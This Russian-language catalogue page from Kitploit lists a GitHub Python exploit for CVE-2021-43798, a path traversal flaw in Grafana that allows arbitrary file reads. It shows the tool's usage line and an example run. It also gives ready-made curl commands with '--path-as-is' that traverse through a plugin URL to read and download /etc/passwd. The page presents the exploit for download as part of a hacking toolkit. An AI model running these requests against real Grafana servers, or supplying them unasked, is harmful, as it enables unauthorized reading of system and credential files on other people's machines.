Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43798 — Эксплойт на Python для CVE-2021-43798, уязвимость обхода пути в Grafana, позволяющая произвольное чтение файлов через обход каталогов в URL-адресах плагинов. | Kitploit
Инструменты/GitHubGitHub/g01d3nw01f/cve-2021-43798
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubg01d3nw01f/cve-2021-43798

CVE-2021-43798

Эксплойт на Python для CVE-2021-43798, уязвимость обхода пути в Grafana, позволяющая произвольное чтение файлов через обход каталогов в URL-адресах плагинов.

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

использование: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: ошибка: требуются следующие аргументы: -H/--host

пример: python3 grafana-exploit.py --host <target_host>

при успешном чтении произвольного файла показать URL запроса и команду curl

root@kitploit:~
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"

поэтому, если вы хотите скачать файл, выполните команду, как показано выше

root@kitploit:~
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
Скачать инструмент